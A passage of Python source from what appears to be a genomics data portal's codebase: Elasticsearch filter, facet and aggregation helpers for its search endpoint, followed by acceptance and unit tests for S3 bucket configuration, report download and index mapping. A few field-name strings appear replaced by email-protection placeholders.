elif range_direction == 'lt' or range_direction == 'lte':
if term > range_filters[query_field][range_direction]:
range_filters[query_field][range_direction] = term
else:
if query_field not in field_filters:
field_filters[query_field] = {
'must_terms': [],
'must_not_terms': [],
'add_no_value': None
}
# handle case of filtering for null values
if exists_field:
# the value below is True when we want to include 'No value' as a filter
field_filters[query_field]['add_no_value'] = False if not_field else True
continue
if not_field:
field_filters[query_field]['must_not_terms'].append(term)
else:
field_filters[query_field]['must_terms'].append(term)
must_filters = []
must_not_filters = []
for query_field, filters in field_filters.items():
must_terms = {'terms': {query_field: filters['must_terms']}} if filters['must_terms'] else {}
must_not_terms = {'terms': {query_field: filters['must_not_terms']}} if filters['must_not_terms'] else {}
if filters['add_no_value'] is True:
# add to must_not in an OR case, which is equivalent to filtering on 'No value'
should_arr = [must_terms] if must_terms else []
should_arr.append({'bool': {'must_not': {'exists': {'field': query_field}}}})
must_filters.append({'bool': {'should': should_arr}})
elif filters['add_no_value'] is False:
# add to must_not in an OR case, which is equivalent to filtering on '! No value'
should_arr = [must_terms] if must_terms else []
should_arr.append({'exists': {'field': query_field}})
must_filters.append({'bool': {'should': should_arr}})
else: # no filtering on 'No value'
if must_terms: must_filters.append(must_terms)
if must_not_terms: must_not_filters.append(must_not_terms)
# lastly, add range limits to filters if given
for range_field, range_def in range_filters.items():
must_filters.append({
'range' : { range_field : range_def }
})
# To modify filters of elasticsearch_dsl Search, must call to_dict(),
# modify that, then update from the new dict
prev_search = search.to_dict()
# initialize filter hierarchy
final_filters = {'bool': {'must': must_filters, 'must_not': must_not_filters}}
prev_search['query']['bool']['filter'] = final_filters
search.update_from_dict(prev_search)
return search, final_filters
def initialize_additional_facets(request, doc_types, additional_facets, append_facets, current_type_schema):
""" Helper function for below method that handles additional_facets URL param
:param request: current request
:param doc_types: doc_types we are searching on
:param additional_facets: extra facets specified
:param append_facets: list to add additional_facets to
:param current_type_schema: schema of the item we are faceting on
"""
for extra_facet in additional_facets:
aggregation_type = 'terms' # default
# check if defined in facets
if 'facets' in current_type_schema:
if extra_facet in current_type_schema['facets']:
if not current_type_schema['facets'][extra_facet].get('disabled', False):
append_facets.append((extra_facet, current_type_schema['facets'][extra_facet]))
continue # if we found the facet, always continue from here
# not specified as facet - infer range vs. term based on schema
field_definition = schema_for_field(extra_facet, request, doc_types)
if not field_definition: # if not on schema, try "terms"
append_facets.append((
extra_facet, {'title': extra_facet.title()}
))
else:
t = field_definition.get('type', None)
if not t:
log.error('Encountered an additional facet that has no type! %s' % field_definition)
continue # drop this facet
# terms for string
if t == 'string':
append_facets.append((
extra_facet, {'title': extra_facet.title(), 'aggregation_type': aggregation_type}
))
else: # try stats
aggregation_type = 'stats'
append_facets.append((
extra_facet, {
'title': field_definition.get('title', extra_facet.title()),
'aggregation_type': aggregation_type,
'number_step': 'any'
}
))
def initialize_facets(request, doc_types, prepared_terms, schemas, additional_facets):
"""
Initialize the facets used for the search. If searching across multiple
doc_types, only use the default 'Data Type' and 'Status' facets.
Add facets for custom url filters whether or not they're in the schema
Args:
doc_types (list): Item types (@type) for which we are performing a search for.
prepared_terms (dict): terms to match in ES, keyed by ES field name.
schemas (list): List of OrderedDicts of schemas for doc_types.
Returns:
list: tuples containing (0) ElasticSearch-formatted field name (e.g. `embedded.status`) and (1) list of terms for it.
"""
facets = [
# More facets will be appended to this list from item schema plus from any currently-active filters (as requested in URI params).
('type', {'title': 'Data Type'})
]
append_facets = [
# Facets which will be appended after those which are in & added to `facets`
('status', {'title': 'Status'}),
# TODO: Re-enable below line if/when 'range' URI param queries for date & numerical fields are implemented.
# ('date_created', {'title': 'Date Created', 'hide_from_view' : True, 'aggregation_type' : 'date_histogram' })
]
# validation_error_facets = [
# ('validation_errors.name', {'title': 'Validation Errors', 'order': 999})
# ]
# hold disabled facets from schema; we also want to remove these from the prepared_terms facets
disabled_facets = []
current_type_schema = request.registry[TYPES][doc_types[0]].schema
initialize_additional_facets(request, doc_types, additional_facets,
append_facets, current_type_schema)
# Add facets from schema if one Item type is defined.
# Also, conditionally add extra appendable facets if relevant for type from schema.
if len(doc_types) == 1 and doc_types[0] != 'Item':
if 'facets' in current_type_schema:
schema_facets = OrderedDict(current_type_schema['facets'])
for schema_facet in schema_facets.items():
if schema_facet[1].get('disabled', False) or schema_facet[1].get('default_hidden', False):
disabled_facets.append(schema_facet[0])
continue # Skip disabled facets.
facets.append(schema_facet)
# Add facets for any non-schema ?field=value filters requested in the search (unless already set)
used_facets = [facet[0] for facet in facets + append_facets]
used_facet_titles = used_facet_titles = [
facet[1]['title'] for facet in facets + append_facets
if 'title' in facet[1]
]
for field in prepared_terms:
if field.startswith('embedded'):
split_field = field.strip().split('.') # Will become, e.g. ['embedded', 'experiments_in_set', 'files', 'file_size', 'from']
use_field = '.'.join(split_field[1:])
# 'terms' is the default per-term bucket aggregation for all non-schema facets
aggregation_type = 'terms'
# Use the last part of the split field to get the field title
title_field = split_field[-1]
# workaround: if query has a '!=' condition, title_field ends with '!'. This prevents to find the proper display title.
# TODO: instead of workaround, '!' could be excluded while generating query results
if title_field.endswith('!'):
title_field = title_field[:-1]
# if searching for a display_title, use the title of parent object
# use `is_object_title` to keep track of this
if title_field == 'display_title' and len(split_field) > 1:
title_field = split_field[-2]
is_object_title = True
else:
is_object_title = False
if title_field in used_facets or title_field in disabled_facets:
# Cancel if already in facets or is disabled
continue
used_facets.append(title_field)
# If we have a range filter in the URL,
if title_field == 'from' or title_field == 'to':
if len(split_field) >= 3:
f_field = ".".join(split_field[1:-1])
field_schema = schema_for_field(f_field, request, doc_types)
if field_schema:
is_date_field = determine_if_is_date_field(field, field_schema)
is_numerical_field = field_schema['type'] in ("integer", "float", "number")
if is_date_field or is_numerical_field:
title_field = field_schema.get("title", split_field[-2])
use_field = f_field
aggregation_type = 'stats'
for schema in schemas:
if title_field in schema['properties']:
title_field = schema['properties'][title_field].get('title', title_field)
# see if the title field conflicts for is_object_title facets
if is_object_title and title_field in used_facet_titles:
title_field += ' (Title)'
break
facet_tuple = (use_field, {'title': title_field, 'aggregation_type' : aggregation_type})
# At moment is equivalent to `if aggregation_type == 'stats'`` until/unless more agg types are added for _facets_.
if aggregation_type != 'terms':
# Remove completely if duplicate (e.g. .from and .to both present)
if use_field in used_facets:
continue
#facet_tuple[1]['hide_from_view'] = True # Temporary until we handle these better on front-end.
# Facet would be otherwise added twice if both `.from` and `.to` are requested.
facets.append(facet_tuple)
# Append additional facets (status, validation_errors, ...) at the end of
# list unless were already added via schemas, etc.
used_facets = [ facet[0] for facet in facets ] # Reset this var
for ap_facet in append_facets: # + validation_error_facets:
if ap_facet[0] not in used_facets:
facets.append(ap_facet)
else: # Update with better title if not already defined from e.g. requested filters.
existing_facet_index = used_facets.index(ap_facet[0])
if facets[existing_facet_index][1].get('title') in (None, facets[existing_facet_index][0]):
facets[existing_facet_index][1]['title'] = ap_facet[1]['title']
return facets
def schema_for_field(field, request, doc_types, should_log=False):
'''
Find the schema for the given field (in embedded '.' format). Uses
ff_utils.crawl_schema from snovault and logs any cases where there is an
error finding the field from the schema. Caches results based off of field
and doc types used
Args:
field (string): embedded field path, separated by '.'
request: current Request object
doc_types (list): @types for the search
should_log (bool): logging will only occur if set to True
Returns:
Dictionary schema for the field, or None if not found
'''
types = request.registry[TYPES]
schemas = [ types[dt].schema for dt in doc_types ]
# We cannot hash dict by list (of doc_types) so we convert to unique ordered string
doc_type_string = ','.join(doc_types)
cache = getattr(request, '_field_schema_cache', {})
if (field, doc_type_string) in cache:
return cache[(field, doc_type_string)]
field_schema = None
# for 'validation_errors.*' and 'aggregated_items.*',
# schema will never be found and logging isn't helpful
if (schemas and not field.startswith('validation_errors.') and
not field.startswith('aggregated_items.')):
# 'type' field is really '@type' in the schema
use_field = '@type' if field == 'type' else field
# eliminate '!' from not fields
use_field = use_field[:-1] if use_field.endswith('!') else use_field
for schema in schemas:
try:
field_schema = crawl_schema(types, use_field, schema)
except Exception as exc: # cannot find schema. Log and Return None
if should_log:
log.warning('Cannot find schema in search.py. Type: %s. Field: %s'
% (doc_types[0], field), field=field, error=str(exc))
else:
if field_schema is not None:
break
# Cache result, even if not found, for this request.
cache[(field, doc_type_string)] = field_schema
if not hasattr(request, '_field_schema_cache'):
setattr(request, '_field_schema_cache', cache)
return field_schema
def is_linkto_or_object_array_root_field(field, types, doc_types):
'''Not used currently. May be useful for if we want to enabled "type" : "nested" mappings on lists of dictionaries'''
schema = types[doc_types[0]].schema
field_root = field.split('.')[0]
fr_schema = (schema and schema.get('properties', {}).get(field_root, None)) or None
if fr_schema and fr_schema['type'] == 'array' and (fr_schema['items'].get('linkTo') is not None or fr_schema['items']['type'] == 'object'):
return True
return False
def generate_filters_for_terms_agg_from_search_filters(query_field, search_filters, string_query):
'''
We add a copy of our filters to each facet, minus that of
facet's field itself so that we can get term counts for other terms filters.
And be able to filter w/ it.
Remove filters from fields they apply to.
For example, the 'biosource_type' aggs should not have any
biosource_type filter in place.
Handle 'must' and 'must_not' filters separately
Returns
Copy of search_filters, minus filter for current query_field (if one set).
'''
facet_filters = deepcopy(search_filters['bool'])
for filter_type in ['must', 'must_not']:
if search_filters['bool'][filter_type] == []:
continue
for active_filter in search_filters['bool'][filter_type]: # active_filter => e.g. { 'terms' : { '<EMAIL>': ['ExperimentSetReplicate'] } }
if 'bool' in active_filter and 'should' in active_filter['bool']:
# handle No value case
inner_bool = None
inner_should = active_filter.get('bool').get('should', [])
for or_term in inner_should:
# this may be naive, but assume first non-terms
# filter is the No value quqery
if 'terms' in or_term:
continue
else:
inner_bool = or_term
break
if 'exists' in inner_bool:
compare_field = inner_bool['exists'].get('field')
else:
# attempt to get the field from the alternative No value syntax
compare_field = inner_bool.get('bool', {}).get('must_not', {}).get('exists', {}).get('field')
if compare_field == query_field and query_field != '<EMAIL>':
facet_filters[filter_type].remove(active_filter)
if 'terms' in active_filter:
# there should only be one key here
for compare_field in active_filter['terms'].keys():
# remove filter for a given field for that facet
# skip this for type facet (field = 'type')
# since we always want to include that filter.
if compare_field == query_field and query_field != '<EMAIL>[email protected]':
facet_filters[filter_type].remove(active_filter)
elif 'range' in active_filter:
for compare_field in active_filter['range'].keys():
# Do same as for terms
if compare_field == query_field:
facet_filters[filter_type].remove(active_filter)
# add the string_query, if present, to the bool term with facet_filters
if string_query and string_query['must']:
# combine statements within 'must' for each
facet_filters['must'].append(string_query['must'])
return facet_filters
def set_facets(search, facets, search_filters, string_query, request, doc_types, custom_aggregations=None, size=25, from_=0):
"""
Sets facets in the query as ElasticSearch aggregations, with each aggregation to be
filtered by search_filters minus filter affecting facet field in order to get counts
for other facet term options.
ES5 - simply sets aggs by calling update_from_dict after adding them in
:param facets: Facet field (0) in object dot notation, and a dict or OrderedDict with title property (1).
:type facets: List of tuples.
:param search_filters: Dict of filters which are set for the ES query in set_filters
:param string_query: Dict holding the query_string used in the search
"""
if from_ != 0:
return search
aggs = OrderedDict()
for field, facet in facets: # E.g. 'type','experimentset_type','experiments_in_set.award.project', ...
field_schema = schema_for_field(field, request, doc_types, should_log=True)
is_date_field = field_schema and determine_if_is_date_field(field, field_schema)
is_numerical_field = field_schema and field_schema['type'] in ("integer", "float", "number")
if field == 'type':
query_field = '[email protected]'
elif field.startswith('validation_errors') or field.startswith('aggregated_items'):
query_field = field + '.raw'
elif facet.get('aggregation_type') in ('stats', 'date_histogram', 'histogram', 'range'):
query_field = 'embedded.' + field
else:
query_field = 'embedded.' + field + '.raw'
## Create the aggregation itself, extend facet with info to pass down to front-end
agg_name = field.replace('.', '-')
agg_type = facet.get('aggregation_type', 'terms')
agg_id = agg_type + ':' + agg_name
facet_filters = generate_filters_for_terms_agg_from_search_filters(query_field, search_filters, string_query)
# handle stats aggregetation
if agg_type == 'stats':
if is_date_field:
facet['field_type'] = 'date'
elif is_numerical_field:
facet['field_type'] = field_schema['type'] or "number"
aggs[agg_id] = {
'aggs': {
"primary_agg": {
'stats': {
'field': query_field
}
}
},
'filter': {'bool': facet_filters}
}
# handle range aggregation
elif agg_type == 'range':
ranges = [{k: v for k, v in r.items() if k in ['from', 'to']} for r in facet['ranges']]
aggs[agg_id] = {
'aggs': {
'primary_agg': {
'range': {
'field': query_field,
'ranges': ranges
}
}
},
'filter': {'bool': facet_filters}
}
# default - terms aggregation
else:
facet['aggregation_type'] = 'terms'
term_aggregation = {
"terms" : {
'size' : 100, # Maximum terms returned (default=10); see https://github.com/10up/ElasticPress/wiki/Working-with-Aggregations
'field' : query_field,
'missing' : facet.get("missing_value_replacement", "No value")
}
}
aggs[facet['aggregation_type'] + ":" + agg_name] = {
'aggs': {
"primary_agg" : term_aggregation
},
'filter': {'bool': facet_filters},
}
# Update facet with title, description from field_schema, if missing.
if facet.get('title') is None and field_schema and 'title' in field_schema:
facet['title'] = field_schema['title']
if facet.get('description') is None and field_schema and 'description' in field_schema:
facet['description'] = field_schema['description']
# to achieve OR behavior within facets, search among GLOBAL results,
# not just returned ones. to do this, wrap aggs in ['all_items']
# and add "global": {} to top level aggs query
# see elasticsearch global aggs for documentation (should be ES5 compliant)
search_as_dict = search.to_dict()
search_as_dict['aggs'] = {
'all_items': {
'global': {},
'aggs': aggs
}
}
if size == 0:
# Only perform aggs if size==0 requested, to improve performance for search page queries.
# We do currently have (hidden) monthly date histogram facets which may yet to be utilized for common size!=0 agg use cases.
set_additional_aggregations(search_as_dict, request, doc_types, custom_aggregations)
search.update_from_dict(search_as_dict)
return search
def set_additional_aggregations(search_as_dict, request, doc_types, extra_aggregations=None):
'''
Per-type aggregations may be defined in schemas. Apply them OUTSIDE of globals so they act on our current search filters.
Warning: `search_as_dict` is modified IN PLACE.
'''
types = request.registry[TYPES]
schema = types[doc_types[0]].schema
if schema.get('aggregations'):
for schema_agg_name in schema['aggregations'].keys():
if schema_agg_name == 'all_items':
raise Exception('all_items is a reserved agg name and not allowed as an extra aggregation name.')
search_as_dict['aggs'][schema_agg_name] = schema['aggregations'][schema_agg_name]
if extra_aggregations:
for extra_agg_name in extra_aggregations.keys():
if extra_agg_name == 'all_items':
raise Exception('all_items is a reserved agg name and not allowed as an extra aggregation name.')
search_as_dict['aggs'][extra_agg_name] = extra_aggregations[extra_agg_name]
return search_as_dict
def execute_search(search):
"""
Execute the given Elasticsearch-dsl search. Raise HTTPBadRequest for any
exceptions that arise.
Args:
search: the Elasticsearch-dsl prepared in the search() function
Returns:
Dictionary search results
"""
err_exp = None
try:
es_results = search.execute().to_dict()
except ConnectionTimeout as exc:
err_exp = 'The search failed due to a timeout. Please try a different query.'
except RequestError as exc:
# try to get a specific error message. May fail in some cases
try:
err_detail = str(exc.info['error']['root_cause'][0]['reason'])
except Exception:
err_detail = str(exc)
err_exp = 'The search failed due to a request error: ' + err_detail
except TransportError as exc:
# most general exception
exc_status = getattr(exc, 'status_code')
if exc_status == 'TIMEOUT':
err_exp = 'The search failed due to a timeout. Please try a different query.'
else:
err_exp = 'The search failed due to a transport error: ' + str(exc)
except Exception as exc:
err_exp = 'The search failed. The DCIC team has been notified.'
if err_exp:
raise HTTPBadRequest(explanation=err_exp)
return es_results
def format_facets(es_results, facets, total, additional_facets, search_frame='embedded'):
"""
Format the facets for the final results based on the es results.
Sort based off of the 'order' of the facets
These are stored within 'aggregations' of the result.
If the frame for the search != embedded, return no facets
"""
result = []
if search_frame != 'embedded':
return result
# Loading facets in to the results
if 'aggregations' not in es_results:
return result
aggregations = es_results['aggregations']['all_items']
used_facets = set()
# Sort facets by order (ascending).
# If no order is provided, assume 0 to
# retain order of non-explicitly ordered facets
for field, facet in sorted(facets, key=lambda fct: fct[1].get('order', 0)):
if facet.get('default_hidden', False) and field not in additional_facets: # skip if specified
continue
result_facet = {
'field' : field,
'title' : facet.get('title', field),
'total' : 0
# To be added depending on facet['aggregation_type']: 'terms', 'min', 'max', 'min_as_string', 'max_as_string', ...
}
result_facet.update({ k:v for k,v in facet.items() if k not in result_facet.keys() })
used_facets.add(field)
field_agg_name = field.replace('.', '-')
agg_type = facet['aggregation_type']
full_agg_name = agg_type + ':' + field_agg_name
if full_agg_name in aggregations:
if agg_type == 'stats':
result_facet['total'] = aggregations[full_agg_name]['doc_count']
# Used for fields on which can do range filter on, to provide min + max bounds
for k in aggregations[full_agg_name]["primary_agg"].keys():
result_facet[k] = aggregations[full_agg_name]["primary_agg"][k]
elif agg_type == 'range':
bucket_location = aggregations[full_agg_name]['primary_agg']
# TODO - refactor ?
# merge bucket labels from ranges into buckets
for r in result_facet['ranges']:
for b in bucket_location['buckets']:
# if ranges match we found our bucket, propagate doc_count into 'ranges' field
if (r.get('from', -1) == b.get('from', -1)) and (r.get('to', -1) == b.get('to', -1)):
r['doc_count'] = b['doc_count']
break
# 'terms' assumed
else:
# Default - terms, range, or histogram buckets. Buckets may not be present
result_facet['terms'] = aggregations[full_agg_name]["primary_agg"]["buckets"]
# Choosing to show facets with one term for summary info on search it provides
if len(result_facet.get('terms', [])) < 1:
continue
if len(aggregations[full_agg_name].keys()) > 2:
result_facet['extra_aggs'] = { k:v for k,v in aggregations[full_agg_name].items() if k not in ('doc_count', "primary_agg") }
result.append(result_facet)
return result
def format_extra_aggregations(es_results):
if 'aggregations' not in es_results:
return {}
return { k:v for k,v in es_results['aggregations'].items() if k != 'all_items' }
def format_results(request, hits, search_frame):
"""
Loads results to pass onto UI
Will retrieve the desired frame from the search hits and automatically
add 'validation_errors' and 'aggregated_items' frames if they are present
"""
fields_requested = request.normalized_params.getall('field')
if fields_requested:
frame = 'embedded'
elif search_frame:
frame = search_frame
else:
frame = 'embedded'
if frame in ['embedded', 'object', 'raw']:
# transform 'raw' to 'properties', which is what is stored in ES
if frame == 'raw':
frame = 'properties'
for hit in hits:
frame_result = hit['_source'][frame]
if 'validation_errors' in hit['_source'] and 'validation_errors' not in frame_result:
frame_result['validation_errors'] = hit['_source']['validation_errors']
if 'aggregated_items' in hit['_source'] and 'aggregated_items' not in frame_result:
frame_result['aggregated_items'] = hit['_source']['aggregated_items']
yield frame_result
return
def find_index_by_doc_types(request, doc_types, ignore):
"""
Find the correct index(es) to be search given a list of doc_types.
The types in doc_types are the item class names, formatted like
'Experiment HiC' and index names are the item types, formatted like
'experiment_hi_c'.
Ignore any collection names provided in the ignore param, an array.
Formats output indexes as a string usable by elasticsearch
"""
indexes = []
for doc_type in doc_types:
if doc_type in ignore:
continue
else:
result = find_collection_subtypes(request.registry, doc_type)
namespaced_results = map(lambda t: get_namespaced_index(request, t), result)
indexes.extend(namespaced_results)
# remove any duplicates
indexes = list(set(indexes))
index_string = ','.join(indexes)
return index_string
def make_search_subreq(request, path):
subreq = make_subrequest(request, path)
subreq._stats = getattr(request, "_stats", {})
subreq.registry = request.registry
if hasattr(request, "context"):
subreq.context = request.context
else:
subreq.context = None
subreq.headers['Accept'] = 'application/json'
return subreq
def get_iterable_search_results(request, search_path='/search/', param_lists=None, **kwargs):
'''
Loops through search results, returns 100 (or search_results_chunk_row_size) results at a time. Pass it through itertools.chain.from_iterable to get one big iterable of results.
TODO: Maybe make 'limit=all', and instead of calling invoke_subrequest(subrequest), instead call iter_search_results!
:param request: Only needed to pass to do_subreq to make a subrequest with.
:param search_path: Root path to call, defaults to /search/ (can also use /browse/).
:param param_lists: Dictionary of param:lists_of_vals which is converted to URL query.
:param search_results_chunk_row_size: Amount of results to get per chunk. Default should be fine.
'''
if param_lists is None:
param_lists = deepcopy(DEFAULT_BROWSE_PARAM_LISTS)
else:
param_lists = deepcopy(param_lists)
param_lists['limit'] = ['all']
param_lists['from'] = [0]
param_lists['sort'] = param_lists.get('sort','uuid')
subreq = make_search_subreq(request, '{}?{}'.format(search_path, urlencode(param_lists, True)) )
return iter_search_results(None, subreq, **kwargs)
# Update? used in ./batch_download.py
def iter_search_results(context, request, **kwargs):
return search(context, request, return_generator=True, **kwargs)
def build_table_columns(request, schemas, doc_types):
any_abstract_types = 'Item' in doc_types
if not any_abstract_types: # Check explictly-defined types to see if any are abstract.
type_infos = [ request.registry[TYPES][type] for type in doc_types if type != 'Item' ]
for ti in type_infos:
# We use `type` instead of `isinstance` since we don't want to catch subclasses.
if type(ti) == AbstractTypeInfo:
any_abstract_types = True
break
columns = OrderedDict()
# Add title column, at beginning always
columns['display_title'] = {
"title" : "Title",
"order" : -100,
"type": "string"
}
# Add type column if any abstract types in search
current_action = request.normalized_params.get('currentAction')
if any_abstract_types and current_action != 'selection' and current_action != 'multiselect':
columns['@type'] = {
"title" : "Item Type",
"colTitle" : "Type",
"order" : -80,
"description" : "Type or category of Item",
"type": "string",
"tooltip": True
# Alternative below, if we want type column to be available but hidden by default in selection mode:
# "default_hidden": request.normalized_params.get('currentAction') == 'selection'
}
for schema in schemas:
if 'columns' in schema:
schema_columns = OrderedDict(schema['columns'])
# Add all columns defined in schema
for name, obj in schema_columns.items():
if name not in columns:
columns[name] = obj
else:
# If @type or display_title etc. column defined in schema, then override defaults.
for prop in schema_columns[name]:
columns[name][prop] = schema_columns[name][prop]
# Add description and data type from field schema, if none otherwise.
if not columns[name].get('description') or not columns[name].get('type'):
field_schema = schema_for_field(name, request, doc_types)
if field_schema:
if not columns[name].get('description') and field_schema.get('description') is not None:
columns[name]['description'] = field_schema['description']
if not columns[name].get('type') and field_schema.get('type') is not None:
columns[name]['type'] = field_schema['type']
# add tooltip
if columns[name].get('tooltip') is None:
columns[name]['tooltip'] = True
# iterate through sort_fields and set data type from schema if not already defined
if 'sort_fields' in columns[name]:
sort_fields = columns[name].get('sort_fields')
for sort_field in sort_fields:
if not sort_field.get('type') and sort_field.get('field') is not None:
sort_field_schema = schema_for_field(sort_field.get('field'), request, doc_types)
if sort_field_schema.get('type') is not None:
sort_field['type'] = sort_field_schema.get('type')
# Add status column, if not present, at end.
if 'status' not in columns:
columns['status'] = {
"title" : "Status",
"default_hidden" : True,
"order" : 501,
"type" : "string"
}
# Add created date column, if not present, at end.
if 'date_created' not in columns:
columns['date_created'] = {
"title" : "Date Created",
"default_hidden" : True,
"order" : 510,
"type" : "date"
}
# Add modified date column, if not present, at end.
if 'last_modified.date_modified' not in columns:
columns['last_modified.date_modified'] = {
"title" : "Date Modified",
"default_hidden" : True,
"order" : 520,
"type" : "date"
}
return columns
_ASSEMBLY_MAPPER = {
'GRCh38-minimal': 'hg38',
'GRCh38': 'hg38',
'GRCh37': 'hg19',
'GRCm38': 'mm10',
'GRCm37': 'mm9',
'BDGP6': 'dm4',
'BDGP5': 'dm3',
'WBcel235': 'WBcel235'
}
hgConnect = ''.join([
'http://genome.ucsc.edu/cgi-bin/hgTracks',
'?hubClear=',
])
```
#### File: tests/acceptance/test_dcicutils.py
```python
import pytest
import requests
from dcicutils.env_utils import get_bucket_env, is_stg_or_prd_env, get_standard_mirror_env
from dcicutils.misc_utils import find_association
from dcicutils.s3_utils import s3Utils
pytestmark = [pytest.mark.working, pytest.mark.integrated]
_S3_UTILS_BUCKET_VAR_DATA = [
{
'attribute': 'sys_bucket',
'health_key': 'system_bucket',
'description': "The 'xxx-system' bucket",
'template': 'SYS_BUCKET_TEMPLATE',
'recent': False,
},
{
'attribute': 'outfile_bucket',
'health_key': 'processed_file_bucket',
'description': "The 'xxx-wfoutput' bucket",
'template': 'OUTFILE_BUCKET_TEMPLATE',
'recent': False,
},
{
'attribute': 'raw_file_bucket',
'health_key': 'file_upload_bucket',
'description': "The 'xxx-files' bucket",
'template': 'RAW_BUCKET_TEMPLATE',
'recent': False,
},
{
'attribute': 'blob_bucket',
'health_key': 'blob_bucket',
'description': "The 'xxx-blobs' bucket",
'template': 'BLOB_BUCKET_TEMPLATE',
'recent': False,
},
{
'attribute': 'metadata_bucket',
'health_key': 'metadata_bucket',
'description': "The 'xxx-metadata-bundles' bucket",
'template': 'METADATA_BUCKET_TEMPLATE',
'recent': True,
},
{
'attribute': 'tibanna_output_bucket',
'health_key': 'tibanna_output_bucket',
'description': "The 'tibanna-output' bucket",
'template': 'TIBANNA_OUTPUT_BUCKET_TEMPLATE',
'recent': True,
},
{
'attribute': 'tibanna_cwl_bucket',
'health_key': 'tibanna_cwl_bucket',
'description': "The 'tibanna-cwl' bucket",
'template': 'TIBANNA_CWL_BUCKET_TEMPLATE',
'recent': True,
},
]
def _health_page(*, url):
return requests.get(url+"/health?format=json").json()
def _apply_s3_bucket_name_template(template, arg):
if '%' in template:
return template % arg
else:
return template
_PRD_URL = "https://data.4dnucleome.org"
_STG_URL = "http://staging.4dnucleome.org"
def _test_stg_or_prd(*, me, my_twin, env_from_beanstalk, s3utils):
assert s3utils.url == me
mirror_env = get_standard_mirror_env(env_from_beanstalk)
mirror_s = s3Utils(env=mirror_env)
assert mirror_s.url == my_twin
mirror_health = _health_page(url=mirror_s.url)
assert mirror_health['beanstalk_env'] == mirror_env
assert get_standard_mirror_env(mirror_env) == env_from_beanstalk
def _test_data(*, env_from_beanstalk, s3utils):
_test_stg_or_prd(me=_PRD_URL, my_twin=_STG_URL, env_from_beanstalk=env_from_beanstalk, s3utils=s3utils)
def _test_staging(*, env_from_beanstalk, s3utils):
_test_stg_or_prd(me=_STG_URL, my_twin=_PRD_URL, env_from_beanstalk=env_from_beanstalk, s3utils=s3utils)
@pytest.mark.parametrize('env', [None, 'fourfront-mastertest', 'fourfront-green', 'fourfront-blue', 'data', 'staging'])
def test_s3_utils_bare(env):
# Calling without an env argument or explicit bucket names is only expected to work
# in orchestrated environments with a single environment.
s = s3Utils(env=env)
# No matter where invoked, we should at least get an AWS s3 object
assert s.s3
# This is probably the same everywhere. It doesn't need to vary.
assert s.ACCESS_KEYS_S3_KEY == 'access_key_admin'
for datum in _S3_UTILS_BUCKET_VAR_DATA:
attr_name = datum['attribute']
template_name = datum['template']
# This is behavior we don't want, but it's the normal behavior, so test stability.
# e.g., for env=None, assert s.sys_bucket == 'elasticbeanstalk-None-system'
# but for env='fourfront-mastertest', assert s.sys_bucket == 'elasticbeanstalk-fourfront-mastertest-system'
if hasattr(s, attr_name) and hasattr(s, template_name):
assert getattr(s, attr_name) == _apply_s3_bucket_name_template(getattr(s, template_name),
get_bucket_env(env))
else:
assert datum['recent'], f"Problem with: {datum}"
# As of dcicutils 2.3.0 or 2.3.1 (there was a bug fix in the initial patch),
# the .url is expected to always be set for beanstalk environments, even ones
# that are not stg/prd. But it's still the case that you can call s3Utils(env=None)
# and get back an object that has some things filled even though the bucket names
# are nonsensical and the env is None.
if env:
assert s.url is not ''
health = _health_page(url=s.url)
for k, v in health.items():
if k.endswith("bucket"):
print(f"Considering health page key {k}...")
entry = find_association(_S3_UTILS_BUCKET_VAR_DATA, health_key=k)
assert entry, f"No entry for health key {k}."
if v:
assert getattr(s, entry['attribute']) == v
print("Attribute matches.")
else:
print("No health page value.")
env_from_beanstalk = health['beanstalk_env']
if is_stg_or_prd_env(env):
if env == 'data':
_test_data(env_from_beanstalk=env_from_beanstalk, s3utils=s)
elif env == 'staging':
_test_staging(env_from_beanstalk=env_from_beanstalk, s3utils=s)
elif is_stg_or_prd_env(env):
assert env_from_beanstalk == env
if s.url == _PRD_URL:
_test_data(env_from_beanstalk=env_from_beanstalk, s3utils=s)
else:
_test_staging(env_from_beanstalk=env_from_beanstalk, s3utils=s)
```
#### File: encoded/tests/test_batch_download.py
```python
import pytest
from dcicutils.qa_utils import notice_pytest_fixtures
from ..util import delay_rerun
# Use workbook fixture from BDD tests (including elasticsearch)
from .workbook_fixtures import app_settings, app, workbook
# NOTE WELL: app-settings and app are not used here explicitly but are probably still needed.
# See longer explanation at top of test_aggregation.py -kmp 28-Jun-2020
notice_pytest_fixtures(app_settings, app, workbook)
pytestmark = [# pytest.mark.indexing,
pytest.mark.workbook,
pytest.mark.flaky(rerun_filter=delay_rerun)]
@pytest.mark.skip(reason="update data when we have a working experiment")
def test_report_download(testapp, workbook):
notice_pytest_fixtures(testapp, workbook)
res = testapp.get('/report.tsv?type=Experiment&sort=accession')
assert res.headers['content-type'] == 'text/tsv; charset=UTF-8'
disposition = res.headers['content-disposition']
assert disposition == 'attachment;filename="report.tsv"'
lines = res.body.splitlines()
assert lines[0].split(b'\t') == [
b'ID', b'Accession', b'Assay Type', b'Assay Nickname', b'Target',
b'Biosample', b'Description', b'Lab', b'Project', b'Status',
b'Linked Antibody', b'Species', b'Life stage', b'Age', b'Age Units',
b'Treatment', b'Term ID', b'Concentration', b'Concentration units',
b'Duration', b'Duration units', b'Synchronization',
b'Post-synchronization time', b'Post-synchronization time units',
b'Replicates', b'Files', b'Dbxrefs'
]
assert lines[1].split(b'\t') == [
b'/experiments/ENCSR000AAL/', b'ENCSR000AAL', b'RNA-seq', b'RNA-seq',
b'', b'K562', b'RNA Evaluation K562 Small Total RNA-seq from Gingeras',
b'<NAME>, CSHL', b'ENCODE', b'released', b'',
b'', b'', b'', b'', b'', b'', b'', b'', b'',
b'', b'', b'', b'', b'', b'', b''
]
assert len(lines) == 44
```
#### File: encoded/tests/test_create_mapping.py
```python
import pytest
from dcicutils.deployment_utils import CreateMappingOnDeployManager
from dcicutils.qa_utils import notice_pytest_fixtures
from snovault import COLLECTIONS, TYPES
from snovault.elasticsearch.create_mapping import type_mapping, run as run_create_mapping
from snovault.util import add_default_embeds
from unittest.mock import patch, MagicMock
from .datafixtures import ORDER
from .workbook_fixtures import workbook, app_settings, app
from ..commands import create_mapping_on_deploy
from ..commands.create_mapping_on_deploy import (
ITEM_INDEX_ORDER,
_run_create_mapping # noqa - yeah, it's internal but we want to test it
)
# TODO: We should not be importing *. Even stranger, PyCharm says we don't use anything from there. -kmp 14-Feb-2020
# Experimentally commenting this out. -kmp 28-Jun-2020
# from ..types.experiment import *
pytestmark = [pytest.mark.setone, pytest.mark.working]
# Using workbook inserts - required for test_run_create_mapping_with_upgrader
